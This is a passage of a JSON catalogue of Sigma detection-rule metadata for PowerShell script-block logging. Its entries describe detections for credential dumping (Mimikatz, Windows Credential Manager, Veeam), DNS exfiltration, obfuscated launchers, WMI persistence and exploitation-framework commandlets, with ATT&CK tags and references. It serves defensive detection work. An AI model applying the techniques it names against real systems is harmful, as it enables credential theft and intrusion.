"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3245cd30-e015-40ff-a31d-5cadd5f377ec", "value": "HackTool - Rubeus Execution - ScriptBlock" }, { "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", "meta": { "author": "frack113", "creation_date": "2021-12-19", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_extracting.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bd5971a7-626d-46ab-8176-ed643f694f68", "value": "Extracting Information with PowerShell" }, { "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", "meta": { "author": "frack113", "creation_date": "2021-12-20", "falsepositive": [ "Unknown" ], "filename": "posh_ps_dump_password_windows_credential_manager.yml", "level": "medium", "logsource.category": 
"ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml" ], "tags": [ "attack.credential-access", "attack.t1555" ] }, "related": [ { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", "value": "Dump Credentials from Windows Credential Manager With PowerShell" }, { "description": "Enumerates Active Directory to determine computers that are joined to the domain", "meta": { "author": "frack113", "creation_date": "2022-02-12", "falsepositive": [ "Unknown" ], "filename": "posh_ps_directorysearcher.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml" ], "tags": [ "attack.discovery", "attack.t1018" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f6399cf-2c80-4924-ace1-6fcff3393480", "value": "DirectorySearcher Powershell Exploitation" }, { "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", "meta": { "author": "frack113", 
"creation_date": "2022-02-06", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_get_adreplaccount.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", "https://www.powershellgallery.com/packages/DSInternals", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" ], "tags": [ "attack.credential-access", "attack.t1003.006" ] }, "related": [ { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", "value": "Suspicious Get-ADReplAccount" }, { "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_var.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e54f5149-6ba3-49cf-b153-070d24679126", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell" }, { "description": "Detects 
Obfuscated Powershell via use Clip.exe in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "value": "Invoke-Obfuscation Via Use Clip - Powershell" }, { "description": "Detects Silence EmpireDNSAgent as described in the Group-IB report", "meta": { "author": "Alina Stepchenkova, Group-IB, oscd.community", "creation_date": "2019-11-01", "falsepositive": [ "Unknown" ], "filename": "posh_ps_apt_silence_eda.yml", "level": "critical", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.command-and-control", "attack.t1071.004", "attack.t1572", "attack.impact", "attack.t1529", "attack.g0091", "attack.s0363" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", "value": "Silence.EDA Detection" }, { "description": "Adversaries may use New-PSDrive to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", "meta": { "author": "frack113", "creation_date": "2022-08-13", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_new_psdrive.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c563233-030e-4a07-af8c-ee0490a66d3a", "value": "Suspicious New-PSDrive to Admin Share" }, { "description": "Detects execution of a PowerShell script that contains calls to the \"Veeam.Backup\" class, in order to dump stored credentials.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-04", "falsepositive": [ "Administrators backup scripts (must be 
investigated)" ], "filename": "posh_ps_veeam_credential_dumping_script.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "976d6e6f-a04b-4900-9713-0134a353e38b", "value": "Veeam Backup Servers Credential Dumping Script Execution" }, { "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", "meta": { "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_directory_enum.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "162e69a7-7981-4344-84a9-0f1c9a217a52", "value": "Powershell Directory Enumeration" }, { "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", "meta": { "author": "Alec Costello", "creation_date": "2019-05-16", "falsepositive": [ "Unknown" ], "filename": "posh_ps_nishang_malicious_commandlets.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": 
"windows", "refs": [ "https://github.com/samratashok/nishang", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", "value": "Malicious Nishang PowerShell Commandlets" }, { "description": "Detects powershell scripts that import modules from suspicious directories", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-07", "falsepositive": [ "Unknown" ], "filename": "posh_ps_import_module_susp_dirs.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "value": "Import PowerShell Modules From Suspicious Directories" }, { "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "Legitimate script" ], "filename": "posh_ps_invoke_dnsexfiltration.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/Arno0x/DNSExfiltrator", 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" ], "tags": [ "attack.exfiltration", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355", "value": "Powershell DNSExfiltration" }, { "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", "meta": { "author": "James Pemberton / @4A616D6573", "creation_date": "2019-10-24", "falsepositive": [ "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." ], "filename": "posh_ps_web_request_cmd_and_cmdlets.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba", "value": "Usage Of Web Request Commands And Cmdlets - ScriptBlock" }, { "description": "Detects Invoke-Mimikatz PowerShell script and alike. 
Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-28", "falsepositive": [ "Mimikatz can be useful for testing the security of networks" ], "filename": "posh_ps_potential_invoke_mimikatz.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", "value": "Potential Invoke-Mimikatz PowerShell Script" }, { "description": "Detects PowerShell calling a credential prompt", "meta": { "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "creation_date": "2017-04-09", "falsepositive": [ "Unknown" ], "filename": "posh_ps_prompt_credentials.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/JohnLaTwC/status/850381440629981184", "https://t.co/ezOTGy1a1G", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" ], "tags": [ "attack.credential-access", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca8b77a9-d499-4095-b793-5d5f330d450e", "value": "PowerShell Credential Prompt" }, { "description": "Detects usage of the \"Set-Service\" powershell cmdlet to 
configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-24", "falsepositive": [ "Rare intended use of hidden services", "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "filename": "posh_ps_susp_service_dacl_modification_set_service.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "22d80745-6f2c-46da-826b-77adaededd74", "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS" }, { "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfuscate Alias creation", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-09", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_alias_obfscuation.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1027", "attack.t1059.001" ] }, "related": [ { "dest-uuid": 
"b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", "value": "Potential PowerShell Obfuscation Using Character Join" }, { "description": "Detects suspicious PowerShell invocation command parameters", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-12", "falsepositive": [ "Very special / sneaky PowerShell scripts" ], "filename": "posh_ps_susp_invocation_generic.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ed965133-513f-41d9-a441-e38076a0798f", "value": "Suspicious PowerShell Invocations - Generic" }, { "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_compress.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell" }, { "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-17", "falsepositive": [ "Legitimate admin scripts may use the same technique; it's better to exclude specific computers or users who execute these commands or scripts often" ], "filename": "posh_ps_user_discovery_get_aduser.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c2993223-6da8-4b1a-88ee-668b8bf315e9", "value": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell" }, { "description": "Detects usage of the PowerShell New-MailboxExportRequest Cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-26", "falsepositive": [ "Unknown" ], "filename": "posh_ps_mailboxexport_share.yml", "level": "critical", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ 
"https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://youtu.be/5mqid-7zp8k?t=2481", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "4a241dea-235b-4a7e-8d76-50d817b146c4", "value": "Suspicious PowerShell Mailbox Export to Share - PS" }, { "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", "meta": { "author": "frack113", "creation_date": "2021-12-13", "falsepositive": [ "Unknown" ], "filename": "posh_ps_get_childitem_bookmarks.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml" ], "tags": [ "attack.discovery", "attack.t1217" ] }, "related": [ { "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell" }, { "description": "Detects Set-Alias or New-Alias cmdlet usage. 
This can be used as a means to obfuscate PowerShell scripts", "meta": { "author": "frack113", "creation_date": "2023-01-08", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_set_alias.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/1337Rin/Swag-PSO", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_set_alias.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1027", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "96cd126d-f970-49c4-848a-da3a09f55c55", "value": "Potential PowerShell Obfuscation Using Alias Cmdlets" }, { "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", "meta": { "author": "frack113", "creation_date": "2021-08-19", "falsepositive": [ "Unknown" ], "filename": "posh_ps_wmi_persistence.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", "value": "Powershell WMI Persistence" }, { "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_clip.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "73e67340-0d25-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell" }, { "description": "Detects use of WinAPI functions in PowerShell scripts", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Nikita Nazarov, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Unknown" ], "filename": "posh_ps_win_api_susp_access.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_api_susp_access.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.t1106" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "03d83090-8cba-44a0-b02f-0b756a050306", "value": "Potential WinAPI Calls Via PowerShell Scripts" }, { "description": "Detects keywords from well-known PowerShell exploitation frameworks", "meta": { "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "creation_date": "2017-03-05", "falsepositive": [ "Depending on the scripts, this rule might require some initial tuning to fit the environment" ], "filename": "posh_ps_malicious_keywords.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2921", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", "value": "Malicious PowerShell Keywords" }, { "description": "Detects the execution of powershell scripts with calls to the \"Start-NetEventSession\" cmdlet. Which allows an attacker to start event and packet capture for a network event session.\nAdversaries may attempt to capture network to gather information over the course of an operation.\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.\n", "meta": { "author": "frack113", "creation_date": "2024-05-12", "falsepositive": [ "Legitimate network diagnostic scripts." 
], "filename": "posh_ps_packet_capture.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/5f866ca4517e837c4ea576e7309d0891e78080a8/atomics/T1040/T1040.md#atomic-test-16---powershell-network-sniffing", "https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/7b8935fe4c82cb64d61343de1a8b2e38dd968534/handbooks/10_post_exploitation.md", "https://github.com/forgottentq/powershell/blob/9e616363d497143dc955c4fdce68e5c18d28a6cb/captureWindows-Endpoint.ps1#L13", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_packet_capture.yml" ], "tags": [ "attack.credential-access", "attack.discovery", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "da34e323-1e65-42db-83be-a6725ac2caa3", "value": "Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock" }, { "description": "Detects PowerShell scripts that have capabilities to read files, loop through 